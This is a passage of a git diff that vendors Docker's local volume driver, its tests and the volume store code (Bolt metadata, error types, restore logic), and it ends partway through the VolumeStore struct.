+	rootDirectory := filepath.Join(scope, volumesPathName)
+
+	if err := idtools.MkdirAllAs(rootDirectory, 0700, rootUID, rootGID); err != nil {
+		return nil, err
+	}
+
+	r := &Root{
+		scope:   scope,
+		path:    rootDirectory,
+		volumes: make(map[string]*localVolume),
+		rootUID: rootUID,
+		rootGID: rootGID,
+	}
+
+	dirs, err := ioutil.ReadDir(rootDirectory)
+	if err != nil {
+		return nil, err
+	}
+
+	mountInfos, err := mount.GetMounts()
+	if err != nil {
+		logrus.Debugf("error looking up mounts for local volume cleanup: %v", err)
+	}
+
+	for _, d := range dirs {
+		if !d.IsDir() {
+			continue
+		}
+
+		name := filepath.Base(d.Name())
+		v := &localVolume{
+			driverName: r.Name(),
+			name:       name,
+			path:       r.DataPath(name),
+		}
+		r.volumes[name] = v
+		optsFilePath := filepath.Join(rootDirectory, name, "opts.json")
+		if b, err := ioutil.ReadFile(optsFilePath); err == nil {
+			opts := optsConfig{}
+			if err := json.Unmarshal(b, &opts); err != nil {
+				return nil, errors.Wrapf(err, "error while unmarshaling volume options for volume: %s", name)
+			}
+			// Make sure this isn't an empty optsConfig.
+			// This could be empty due to buggy behavior in older versions of Docker.
+			if !reflect.DeepEqual(opts, optsConfig{}) {
+				v.opts = &opts
+			}
+
+			// unmount anything that may still be mounted (for example, from an unclean shutdown)
+			for _, info := range mountInfos {
+				if info.Mountpoint == v.path {
+					mount.Unmount(v.path)
+					break
+				}
+			}
+		}
+	}
+
+	return r, nil
+}
+
+// Root implements the Driver interface for the volume package and
+// manages the creation/removal of volumes. It uses only standard vfs
+// commands to create/remove dirs within its provided scope.
+type Root struct {
+	m       sync.Mutex
+	scope   string
+	path    string
+	volumes map[string]*localVolume
+	rootUID int
+	rootGID int
+}
+
+// List lists all the volumes
+func (r *Root) List() ([]volume.Volume, error) {
+	var ls []volume.Volume
+	r.m.Lock()
+	for _, v := range r.volumes {
+		ls = append(ls, v)
+	}
+	r.m.Unlock()
+	return ls, nil
+}
+
+// DataPath returns the constructed path of this volume.
+func (r *Root) DataPath(volumeName string) string {
+	return filepath.Join(r.path, volumeName, VolumeDataPathName)
+}
+
+// Name returns the name of Root, defined in the volume package in the DefaultDriverName constant.
+func (r *Root) Name() string {
+	return volume.DefaultDriverName
+}
+
+// Create creates a new volume.Volume with the provided name, creating
+// the underlying directory tree required for this volume in the
+// process.
+func (r *Root) Create(name string, opts map[string]string) (volume.Volume, error) {
+	if err := r.validateName(name); err != nil {
+		return nil, err
+	}
+
+	r.m.Lock()
+	defer r.m.Unlock()
+
+	v, exists := r.volumes[name]
+	if exists {
+		return v, nil
+	}
+
+	path := r.DataPath(name)
+	if err := idtools.MkdirAllAs(path, 0755, r.rootUID, r.rootGID); err != nil {
+		if os.IsExist(err) {
+			return nil, fmt.Errorf("volume already exists under %s", filepath.Dir(path))
+		}
+		return nil, errors.Wrapf(err, "error while creating volume path '%s'", path)
+	}
+
+	var err error
+	defer func() {
+		if err != nil {
+			os.RemoveAll(filepath.Dir(path))
+		}
+	}()
+
+	v = &localVolume{
+		driverName: r.Name(),
+		name:       name,
+		path:       path,
+	}
+
+	if len(opts) != 0 {
+		if err = setOpts(v, opts); err != nil {
+			return nil, err
+		}
+		var b []byte
+		b, err = json.Marshal(v.opts)
+		if err != nil {
+			return nil, err
+		}
+		if err = ioutil.WriteFile(filepath.Join(filepath.Dir(path), "opts.json"), b, 600); err != nil {
+			return nil, errors.Wrap(err, "error while persisting volume options")
+		}
+	}
+
+	r.volumes[name] = v
+	return v, nil
+}
+
+// Remove removes the specified volume and all underlying data. If the
+// given volume does not belong to this driver and an error is
+// returned. The volume is reference counted, if all references are
+// not released then the volume is not removed.
+func (r *Root) Remove(v volume.Volume) error {
+	r.m.Lock()
+	defer r.m.Unlock()
+
+	lv, ok := v.(*localVolume)
+	if !ok {
+		return fmt.Errorf("unknown volume type %T", v)
+	}
+
+	realPath, err := filepath.EvalSymlinks(lv.path)
+	if err != nil {
+		if !os.IsNotExist(err) {
+			return err
+		}
+		realPath = filepath.Dir(lv.path)
+	}
+
+	if !r.scopedPath(realPath) {
+		return fmt.Errorf("Unable to remove a directory of out the Docker root %s: %s", r.scope, realPath)
+	}
+
+	if err := removePath(realPath); err != nil {
+		return err
+	}
+
+	delete(r.volumes, lv.name)
+	return removePath(filepath.Dir(lv.path))
+}
+
+func removePath(path string) error {
+	if err := os.RemoveAll(path); err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return errors.Wrapf(err, "error removing volume path '%s'", path)
+	}
+	return nil
+}
+
+// Get looks up the volume for the given name and returns it if found
+func (r *Root) Get(name string) (volume.Volume, error) {
+	r.m.Lock()
+	v, exists := r.volumes[name]
+	r.m.Unlock()
+	if !exists {
+		return nil, ErrNotFound
+	}
+	return v, nil
+}
+
+// Scope returns the local volume scope
+func (r *Root) Scope() string {
+	return volume.LocalScope
+}
+
+func (r *Root) validateName(name string) error {
+	if len(name) == 1 {
+		return validationError{fmt.Errorf("volume name is too short, names should be at least two alphanumeric characters")}
+	}
+	if !volumeNameRegex.MatchString(name) {
+		return validationError{fmt.Errorf("%q includes invalid characters for a local volume name, only %q are allowed. If you intented to pass a host directory, use absolute path", name, utils.RestrictedNameChars)}
+	}
+	return nil
+}
+
+// localVolume implements the Volume interface from the volume package and
+// represents the volumes created by Root.
+type localVolume struct {
+	m sync.Mutex
+	// unique name of the volume
+	name string
+	// path is the path on the host where the data lives
+	path string
+	// driverName is the name of the driver that created the volume.
+	driverName string
+	// opts is the parsed list of options used to create the volume
+	opts *optsConfig
+	// active refcounts the active mounts
+	active activeMount
+}
+
+// Name returns the name of the given Volume.
+func (v *localVolume) Name() string {
+	return v.name
+}
+
+// DriverName returns the driver that created the given Volume.
+func (v *localVolume) DriverName() string {
+	return v.driverName
+}
+
+// Path returns the data location.
+func (v *localVolume) Path() string {
+	return v.path
+}
+
+// Mount implements the localVolume interface, returning the data location.
+func (v *localVolume) Mount(id string) (string, error) {
+	v.m.Lock()
+	defer v.m.Unlock()
+	if v.opts != nil {
+		if !v.active.mounted {
+			if err := v.mount(); err != nil {
+				return "", err
+			}
+			v.active.mounted = true
+		}
+		v.active.count++
+	}
+	return v.path, nil
+}
+
+// Umount is for satisfying the localVolume interface and does not do anything in this driver.
+func (v *localVolume) Unmount(id string) error {
+	v.m.Lock()
+	defer v.m.Unlock()
+	if v.opts != nil {
+		v.active.count--
+		if v.active.count == 0 {
+			if err := mount.Unmount(v.path); err != nil {
+				v.active.count++
+				return errors.Wrapf(err, "error while unmounting volume path '%s'", v.path)
+			}
+			v.active.mounted = false
+		}
+	}
+	return nil
+}
+
+func validateOpts(opts map[string]string) error {
+	for opt := range opts {
+		if !validOpts[opt] {
+			return validationError{fmt.Errorf("invalid option key: %q", opt)}
+		}
+	}
+	return nil
+}
+
+func (v *localVolume) Status() map[string]interface{} {
+	return nil
+}
+
+// getAddress finds out address/hostname from options
+func getAddress(opts string) string {
+	optsList := strings.Split(opts, ",")
+	for i := 0; i < len(optsList); i++ {
+		if strings.HasPrefix(optsList[i], "addr=") {
+			addr := (strings.SplitN(optsList[i], "=", 2)[1])
+			return addr
+		}
+	}
+	return ""
+}
diff --git a/vendor/github.com/docker/docker/volume/local/local_test.go b/vendor/github.com/docker/docker/volume/local/local_test.go
new file mode 100644
index 0000000000..f5a519b883
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/local/local_test.go
@@ -0,0 +1,344 @@
+package local
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/pkg/mount"
+)
+
+func TestGetAddress(t *testing.T) {
+	cases := map[string]string{
+		"addr=11.11.11.1":   "11.11.11.1",
+		" ":                 "",
+		"addr=":             "",
+		"addr=2001:db8::68": "2001:db8::68",
+	}
+	for name, success := range cases {
+		v := getAddress(name)
+		if v != success {
+			t.Errorf("Test case failed for %s actual: %s expected : %s", name, v, success)
+		}
+	}
+
+}
+
+func TestRemove(t *testing.T) {
+	// TODO Windows: Investigate why this test fails on Windows under CI
+	//               but passes locally.
+	if runtime.GOOS == "windows" {
+		t.Skip("Test failing on Windows CI")
+	}
+	rootDir, err := ioutil.TempDir("", "local-volume-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(rootDir)
+
+	r, err := New(rootDir, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	vol, err := r.Create("testing", nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := r.Remove(vol); err != nil {
+		t.Fatal(err)
+	}
+
+	vol, err = r.Create("testing2", nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := os.RemoveAll(vol.Path()); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := r.Remove(vol); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := os.Stat(vol.Path()); err != nil && !os.IsNotExist(err) {
+		t.Fatal("volume dir not removed")
+	}
+
+	if l, _ := r.List(); len(l) != 0 {
+		t.Fatal("expected there to be no volumes")
+	}
+}
+
+func TestInitializeWithVolumes(t *testing.T) {
+	rootDir, err := ioutil.TempDir("", "local-volume-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(rootDir)
+
+	r, err := New(rootDir, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	vol, err := r.Create("testing", nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	r, err = New(rootDir, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	v, err := r.Get(vol.Name())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if v.Path() != vol.Path() {
+		t.Fatal("expected to re-initialize root with existing volumes")
+	}
+}
+
+func TestCreate(t *testing.T) {
+	rootDir, err := ioutil.TempDir("", "local-volume-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(rootDir)
+
+	r, err := New(rootDir, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	cases := map[string]bool{
+		"name":                  true,
+		"name-with-dash":        true,
+		"name_with_underscore":  true,
+		"name/with/slash":       false,
+		"name/with/../../slash": false,
+		"./name":                false,
+		"../name":               false,
+		"./":                    false,
+		"../":                   false,
+		"~":                     false,
+		".":                     false,
+		"..":                    false,
+		"...":                   false,
+	}
+
+	for name, success := range cases {
+		v, err := r.Create(name, nil)
+		if success {
+			if err != nil {
+				t.Fatal(err)
+			}
+			if v.Name() != name {
+				t.Fatalf("Expected volume with name %s, got %s", name, v.Name())
+			}
+		} else {
+			if err == nil {
+				t.Fatalf("Expected error creating volume with name %s, got nil", name)
+			}
+		}
+	}
+
+	r, err = New(rootDir, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestValidateName(t *testing.T) {
+	r := &Root{}
+	names := map[string]bool{
+		"x":           false,
+		"/testvol":    false,
+		"thing.d":     true,
+		"hello-world": true,
+		"./hello":     false,
+		".hello":      false,
+	}
+
+	for vol, expected := range names {
+		err := r.validateName(vol)
+		if expected && err != nil {
+			t.Fatalf("expected %s to be valid got %v", vol, err)
+		}
+		if !expected && err == nil {
+			t.Fatalf("expected %s to be invalid", vol)
+		}
+	}
+}
+
+func TestCreateWithOpts(t *testing.T) {
+	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
+		t.Skip()
+	}
+	rootDir, err := ioutil.TempDir("", "local-volume-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(rootDir)
+
+	r, err := New(rootDir, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := r.Create("test", map[string]string{"invalidopt": "notsupported"}); err == nil {
+		t.Fatal("expected invalid opt to cause error")
+	}
+
+	vol, err := r.Create("test", map[string]string{"device": "tmpfs", "type": "tmpfs", "o": "size=1m,uid=1000"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	v := vol.(*localVolume)
+
+	dir, err := v.Mount("1234")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := v.Unmount("1234"); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	mountInfos, err := mount.GetMounts()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	var found bool
+	for _, info := range mountInfos {
+		if info.Mountpoint == dir {
+			found = true
+			if info.Fstype != "tmpfs" {
+				t.Fatalf("expected tmpfs mount, got %q", info.Fstype)
+			}
+			if info.Source != "tmpfs" {
+				t.Fatalf("expected tmpfs mount, got %q", info.Source)
+			}
+			if !strings.Contains(info.VfsOpts, "uid=1000") {
+				t.Fatalf("expected mount info to have uid=1000: %q", info.VfsOpts)
+			}
+			if !strings.Contains(info.VfsOpts, "size=1024k") {
+				t.Fatalf("expected mount info to have size=1024k: %q", info.VfsOpts)
+			}
+			break
+		}
+	}
+
+	if !found {
+		t.Fatal("mount not found")
+	}
+
+	if v.active.count != 1 {
+		t.Fatalf("Expected active mount count to be 1, got %d", v.active.count)
+	}
+
+	// test double mount
+	if _, err := v.Mount("1234"); err != nil {
+		t.Fatal(err)
+	}
+	if v.active.count != 2 {
+		t.Fatalf("Expected active mount count to be 2, got %d", v.active.count)
+	}
+
+	if err := v.Unmount("1234"); err != nil {
+		t.Fatal(err)
+	}
+	if v.active.count != 1 {
+		t.Fatalf("Expected active mount count to be 1, got %d", v.active.count)
+	}
+
+	mounted, err := mount.Mounted(v.path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !mounted {
+		t.Fatal("expected mount to still be active")
+	}
+
+	r, err = New(rootDir, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	v2, exists := r.volumes["test"]
+	if !exists {
+		t.Fatal("missing volume on restart")
+	}
+
+	if !reflect.DeepEqual(v.opts, v2.opts) {
+		t.Fatal("missing volume options on restart")
+	}
+}
+
+func TestRealodNoOpts(t *testing.T) {
+	rootDir, err := ioutil.TempDir("", "volume-test-reload-no-opts")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(rootDir)
+
+	r, err := New(rootDir, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := r.Create("test1", nil); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := r.Create("test2", nil); err != nil {
+		t.Fatal(err)
+	}
+	// make sure a file with `null` (.e.g. empty opts map from older daemon) is ok
+	if err := ioutil.WriteFile(filepath.Join(rootDir, "test2"), []byte("null"), 600); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := r.Create("test3", nil); err != nil {
+		t.Fatal(err)
+	}
+	// make sure an empty opts file doesn't break us too
+	if err := ioutil.WriteFile(filepath.Join(rootDir, "test3"), nil, 600); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := r.Create("test4", map[string]string{}); err != nil {
+		t.Fatal(err)
+	}
+
+	r, err = New(rootDir, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	for _, name := range []string{"test1", "test2", "test3", "test4"} {
+		v, err := r.Get(name)
+		if err != nil {
+			t.Fatal(err)
+		}
+		lv, ok := v.(*localVolume)
+		if !ok {
+			t.Fatalf("expected *localVolume got: %v", reflect.TypeOf(v))
+		}
+		if lv.opts != nil {
+			t.Fatalf("expected opts to be nil, got: %v", lv.opts)
+		}
+		if _, err := lv.Mount("1234"); err != nil {
+			t.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/local/local_unix.go b/vendor/github.com/docker/docker/volume/local/local_unix.go
new file mode 100644
index 0000000000..fb08862cef
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/local/local_unix.go
@@ -0,0 +1,87 @@
+// +build linux freebsd solaris
+
+// Package local provides the default implementation for volumes. It
+// is used to mount data volume containers and directories local to
+// the host server.
+package local
+
+import (
+	"fmt"
+	"net"
+	"path/filepath"
+	"strings"
+
+	"github.com/pkg/errors"
+
+	"github.com/docker/docker/pkg/mount"
+)
+
+var (
+	oldVfsDir = filepath.Join("vfs", "dir")
+
+	validOpts = map[string]bool{
+		"type":   true, // specify the filesystem type for mount, e.g. nfs
+		"o":      true, // generic mount options
+		"device": true, // device to mount from
+	}
+)
+
+type optsConfig struct {
+	MountType   string
+	MountOpts   string
+	MountDevice string
+}
+
+func (o *optsConfig) String() string {
+	return fmt.Sprintf("type='%s' device='%s' o='%s'", o.MountType, o.MountDevice, o.MountOpts)
+}
+
+// scopedPath verifies that the path where the volume is located
+// is under Docker's root and the valid local paths.
+func (r *Root) scopedPath(realPath string) bool {
+	// Volumes path for Docker version >= 1.7
+	if strings.HasPrefix(realPath, filepath.Join(r.scope, volumesPathName)) && realPath != filepath.Join(r.scope, volumesPathName) {
+		return true
+	}
+
+	// Volumes path for Docker version < 1.7
+	if strings.HasPrefix(realPath, filepath.Join(r.scope, oldVfsDir)) {
+		return true
+	}
+
+	return false
+}
+
+func setOpts(v *localVolume, opts map[string]string) error {
+	if len(opts) == 0 {
+		return nil
+	}
+	if err := validateOpts(opts); err != nil {
+		return err
+	}
+
+	v.opts = &optsConfig{
+		MountType:   opts["type"],
+		MountOpts:   opts["o"],
+		MountDevice: opts["device"],
+	}
+	return nil
+}
+
+func (v *localVolume) mount() error {
+	if v.opts.MountDevice == "" {
+		return fmt.Errorf("missing device in volume options")
+	}
+	mountOpts := v.opts.MountOpts
+	if v.opts.MountType == "nfs" {
+		if addrValue := getAddress(v.opts.MountOpts); addrValue != "" && net.ParseIP(addrValue).To4() == nil {
+			ipAddr, err := net.ResolveIPAddr("ip", addrValue)
+			if err != nil {
+				return errors.Wrapf(err, "error resolving passed in nfs address")
+			}
+			mountOpts = strings.Replace(mountOpts, "addr="+addrValue, "addr="+ipAddr.String(), 1)
+		}
+	}
+	err := mount.Mount(v.opts.MountDevice, v.path, v.opts.MountType, mountOpts)
+	return errors.Wrapf(err, "error while mounting volume with options: %s", v.opts)
+}
diff --git a/vendor/github.com/docker/docker/volume/local/local_windows.go b/vendor/github.com/docker/docker/volume/local/local_windows.go
new file mode 100644
index 0000000000..1bdb368a0f
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/local/local_windows.go
@@ -0,0 +1,34 @@
+// Package local provides the default implementation for volumes. It
+// is used to mount data volume containers and directories local to
+// the host server.
+package local
+
+import (
+	"fmt"
+	"path/filepath"
+	"strings"
+)
+
+type optsConfig struct{}
+
+var validOpts map[string]bool
+
+// scopedPath verifies that the path where the volume is located
+// is under Docker's root and the valid local paths.
+func (r *Root) scopedPath(realPath string) bool {
+	if strings.HasPrefix(realPath, filepath.Join(r.scope, volumesPathName)) && realPath != filepath.Join(r.scope, volumesPathName) {
+		return true
+	}
+	return false
+}
+
+func setOpts(v *localVolume, opts map[string]string) error {
+	if len(opts) > 0 {
+		return fmt.Errorf("options are not supported on this platform")
+	}
+	return nil
+}
+
+func (v *localVolume) mount() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/volume/store/db.go b/vendor/github.com/docker/docker/volume/store/db.go
new file mode 100644
index 0000000000..c5fd1643f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/store/db.go
@@ -0,0 +1,88 @@
+package store
+
+import (
+	"encoding/json"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/boltdb/bolt"
+	"github.com/pkg/errors"
+)
+
+var volumeBucketName = []byte("volumes")
+
+type volumeMetadata struct {
+	Name    string
+	Driver  string
+	Labels  map[string]string
+	Options map[string]string
+}
+
+func (s *VolumeStore) setMeta(name string, meta volumeMetadata) error {
+	return s.db.Update(func(tx *bolt.Tx) error {
+		return setMeta(tx, name, meta)
+	})
+}
+
+func setMeta(tx *bolt.Tx, name string, meta volumeMetadata) error {
+	metaJSON, err := json.Marshal(meta)
+	if err != nil {
+		return err
+	}
+	b := tx.Bucket(volumeBucketName)
+	return errors.Wrap(b.Put([]byte(name), metaJSON), "error setting volume metadata")
+}
+
+func (s *VolumeStore) getMeta(name string) (volumeMetadata, error) {
+	var meta volumeMetadata
+	err := s.db.View(func(tx *bolt.Tx) error {
+		return getMeta(tx, name, &meta)
+	})
+	return meta, err
+}
+
+func getMeta(tx *bolt.Tx, name string, meta *volumeMetadata) error {
+	b := tx.Bucket(volumeBucketName)
+	val := b.Get([]byte(name))
+	if string(val) == "" {
+		return nil
+	}
+	if err := json.Unmarshal(val, meta); err != nil {
+		return errors.Wrap(err, "error unmarshaling volume metadata")
+	}
+	return nil
+}
+
+func (s *VolumeStore) removeMeta(name string) error {
+	return s.db.Update(func(tx *bolt.Tx) error {
+		return removeMeta(tx, name)
+	})
+}
+
+func removeMeta(tx *bolt.Tx, name string) error {
+	b := tx.Bucket(volumeBucketName)
+	return errors.Wrap(b.Delete([]byte(name)), "error removing volume metadata")
+}
+
+// listMeta is used during restore to get the list of volume metadata
+// from the on-disk database.
+// Any errors that occur are only logged.
+func listMeta(tx *bolt.Tx) []volumeMetadata {
+	var ls []volumeMetadata
+	b := tx.Bucket(volumeBucketName)
+	b.ForEach(func(k, v []byte) error {
+		if len(v) == 0 {
+			// don't try to unmarshal an empty value
+			return nil
+		}
+
+		var m volumeMetadata
+		if err := json.Unmarshal(v, &m); err != nil {
+			// Just log the error
+			logrus.Errorf("Error while reading volume metadata for volume %q: %v", string(k), err)
+			return nil
+		}
+		ls = append(ls, m)
+		return nil
+	})
+	return ls
+}
diff --git a/vendor/github.com/docker/docker/volume/store/errors.go b/vendor/github.com/docker/docker/volume/store/errors.go
new file mode 100644
index 0000000000..980175f29c
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/store/errors.go
@@ -0,0 +1,76 @@
+package store
+
+import (
+	"strings"
+
+	"github.com/pkg/errors"
+)
+
+var (
+	// errVolumeInUse is a typed error returned when trying to remove a volume that is currently in use by a container
+	errVolumeInUse = errors.New("volume is in use")
+	// errNoSuchVolume is a typed error returned if the requested volume doesn't exist in the volume store
+	errNoSuchVolume = errors.New("no such volume")
+	// errInvalidName is a typed error returned when creating a volume with a name that is not valid on the platform
+	errInvalidName = errors.New("volume name is not valid on this platform")
+	// errNameConflict is a typed error returned on create when a volume exists with the given name, but for a different driver
+	errNameConflict = errors.New("volume name must be unique")
+)
+
+// OpErr is the error type returned by functions in the store package. It describes
+// the operation, volume name, and error.
+type OpErr struct {
+	// Err is the error that occurred during the operation.
+	Err error
+	// Op is the operation which caused the error, such as "create", or "list".
+	Op string
+	// Name is the name of the resource being requested for this op, typically the volume name or the driver name.
+	Name string
+	// Refs is the list of references associated with the resource.
+	Refs []string
+}
+
+// Error satisfies the built-in error interface type.
+func (e *OpErr) Error() string {
+	if e == nil {
+		return "<nil>"
+	}
+	s := e.Op
+	if e.Name != "" {
+		s = s + " " + e.Name
+	}
+
+	s = s + ": " + e.Err.Error()
+	if len(e.Refs) > 0 {
+		s = s + " - " + "[" + strings.Join(e.Refs, ", ") + "]"
+	}
+	return s
+}
+
+// IsInUse returns a boolean indicating whether the error indicates that a
+// volume is in use
+func IsInUse(err error) bool {
+	return isErr(err, errVolumeInUse)
+}
+
+// IsNotExist returns a boolean indicating whether the error indicates that the volume does not exist
+func IsNotExist(err error) bool {
+	return isErr(err, errNoSuchVolume)
+}
+
+// IsNameConflict returns a boolean indicating whether the error indicates that a
+// volume name is already taken
+func IsNameConflict(err error) bool {
+	return isErr(err, errNameConflict)
+}
+
+func isErr(err error, expected error) bool {
+	err = errors.Cause(err)
+	switch pe := err.(type) {
+	case nil:
+		return false
+	case *OpErr:
+		err = errors.Cause(pe.Err)
+	}
+	return err == expected
+}
diff --git a/vendor/github.com/docker/docker/volume/store/restore.go b/vendor/github.com/docker/docker/volume/store/restore.go
new file mode 100644
index 0000000000..c0c5b519bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/store/restore.go
@@ -0,0 +1,83 @@
+package store
+
+import (
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/boltdb/bolt"
+	"github.com/docker/docker/volume"
+	"github.com/docker/docker/volume/drivers"
+)
+
+// restore is called when a new volume store is created.
+// It's primary purpose is to ensure that all drivers' refcounts are set based
+// on known volumes after a restart.
+// This only attempts to track volumes that are actually stored in the on-disk db.
+// It does not probe the available drivers to find anything that may have been added
+// out of band.
+func (s *VolumeStore) restore() {
+	var ls []volumeMetadata
+	s.db.View(func(tx *bolt.Tx) error {
+		ls = listMeta(tx)
+		return nil
+	})
+
+	chRemove := make(chan *volumeMetadata, len(ls))
+	var wg sync.WaitGroup
+	for _, meta := range ls {
+		wg.Add(1)
+		// this is potentially a very slow operation, so do it in a goroutine
+		go func(meta volumeMetadata) {
+			defer wg.Done()
+
+			var v volume.Volume
+			var err error
+			if meta.Driver != "" {
+				v, err = lookupVolume(meta.Driver, meta.Name)
+				if err != nil && err != errNoSuchVolume {
+					logrus.WithError(err).WithField("driver", meta.Driver).WithField("volume", meta.Name).Warn("Error restoring volume")
+					return
+				}
+				if v == nil {
+					// doesn't exist in the driver, remove it from the db
+					chRemove <- &meta
+					return
+				}
+			} else {
+				v, err = s.getVolume(meta.Name)
+				if err != nil {
+					if err == errNoSuchVolume {
+						chRemove <- &meta
+					}
+					return
+				}
+
+				meta.Driver = v.DriverName()
+				if err := s.setMeta(v.Name(), meta); err != nil {
+					logrus.WithError(err).WithField("driver", meta.Driver).WithField("volume", v.Name()).Warn("Error updating volume metadata on restore")
+				}
+			}
+
+			// increment driver refcount
+			volumedrivers.CreateDriver(meta.Driver)
+
+			// cache the volume
+			s.globalLock.Lock()
+			s.options[v.Name()] = meta.Options
+			s.labels[v.Name()] = meta.Labels
+			s.names[v.Name()] = v
+			s.globalLock.Unlock()
+		}(meta)
+	}
+
+	wg.Wait()
+	close(chRemove)
+	s.db.Update(func(tx *bolt.Tx) error {
+		for meta := range chRemove {
+			if err := removeMeta(tx, meta.Name); err != nil {
+				logrus.WithField("volume", meta.Name).Warnf("Error removing stale entry from volume db: %v", err)
+			}
+		}
+		return nil
+	})
+}
diff --git a/vendor/github.com/docker/docker/volume/store/store.go b/vendor/github.com/docker/docker/volume/store/store.go
new file mode 100644
index 0000000000..38afd86f45
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/store/store.go
@@ -0,0 +1,649 @@
+package store
+
+import (
+	"net"
+	"os"
+	"path/filepath"
+	"sync"
+	"time"
+
+	"github.com/pkg/errors"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/boltdb/bolt"
+	"github.com/docker/docker/pkg/locker"
+	"github.com/docker/docker/volume"
+	"github.com/docker/docker/volume/drivers"
+)
+
+const (
+	volumeDataDir = "volumes"
+)
+
+type volumeWrapper struct {
+	volume.Volume
+	labels  map[string]string
+	scope   string
+	options map[string]string
+}
+
+func (v volumeWrapper) Options() map[string]string {
+	options := map[string]string{}
+	for key, value := range v.options {
+		options[key] = value
+	}
+	return options
+}
+
+func (v volumeWrapper) Labels() map[string]string {
+	return v.labels
+}
+
+func (v volumeWrapper) Scope() string {
+	return v.scope
+}
+
+func (v volumeWrapper) CachedPath() string {
+	if vv, ok := v.Volume.(interface {
+		CachedPath() string
+	}); ok {
+		return vv.CachedPath()
+	}
+	return v.Volume.Path()
+}
+
+// New initializes a VolumeStore to keep
+// reference counting of volumes in the system.
+func New(rootPath string) (*VolumeStore, error) {
+	vs := &VolumeStore{
+		locks:   &locker.Locker{},
+		names:   make(map[string]volume.Volume),
+		refs:    make(map[string][]string),
+		labels:  make(map[string]map[string]string),
+		options: make(map[string]map[string]string),
+	}
+
+	if rootPath != "" {
+		// initialize metadata store
+		volPath := filepath.Join(rootPath, volumeDataDir)
+		if err := os.MkdirAll(volPath, 750); err != nil {
+			return nil, err
+		}
+
+		dbPath := filepath.Join(volPath, "metadata.db")
+
+		var err error
+		vs.db, err = bolt.Open(dbPath, 0600, &bolt.Options{Timeout: 1 * time.Second})
+		if err != nil {
+			return nil, errors.Wrap(err, "error while opening volume store metadata database")
+		}
+
+		// initialize volumes bucket
+		if err := vs.db.Update(func(tx *bolt.Tx) error {
+			if _, err := tx.CreateBucketIfNotExists(volumeBucketName); err != nil {
+				return errors.Wrap(err, "error while setting up volume store metadata database")
+			}
+			return nil
+		}); err != nil {
+			return nil, err
+		}
+	}
+
+	vs.restore()
+
+	return vs, nil
+}
+
+func (s *VolumeStore) getNamed(name string) (volume.Volume, bool) {
+	s.globalLock.RLock()
+	v, exists := s.names[name]
+	s.globalLock.RUnlock()
+	return v, exists
+}
+
+func (s *VolumeStore) setNamed(v volume.Volume, ref string) {
+	s.globalLock.Lock()
+	s.names[v.Name()] = v
+	if len(ref) > 0 {
+		s.refs[v.Name()] = append(s.refs[v.Name()], ref)
+	}
+	s.globalLock.Unlock()
+}
+
+// getRefs gets the list of refs for a given name
+// Callers of this function are expected to hold the name lock.
+func (s *VolumeStore) getRefs(name string) []string {
+	s.globalLock.RLock()
+	refs := s.refs[name]
+	s.globalLock.RUnlock()
+	return refs
+}
+
+// Purge allows the cleanup of internal data on docker in case
+// the internal data is out of sync with volumes driver plugins.
+func (s *VolumeStore) Purge(name string) {
+	s.globalLock.Lock()
+	v, exists := s.names[name]
+	if exists {
+		if _, err := volumedrivers.RemoveDriver(v.DriverName()); err != nil {
+			logrus.Error("Error dereferencing volume driver: %v", err)
+		}
+	}
+	if err := s.removeMeta(name); err != nil {
+		logrus.Errorf("Error removing volume metadata for volume %q: %v", name, err)
+	}
+	delete(s.names, name)
+	delete(s.refs, name)
+	delete(s.labels, name)
+	delete(s.options, name)
+	s.globalLock.Unlock()
+}
+
+// VolumeStore is a struct that stores the list of volumes available and keeps track of their usage counts
+type VolumeStore struct {
+	// locks ensures that only one action is being performed on a particular volume at a time without locking the entire store
+	// since actions on volumes can be quite slow, this ensures the store is free to handle requests for other volumes.
+	locks *locker.Locker
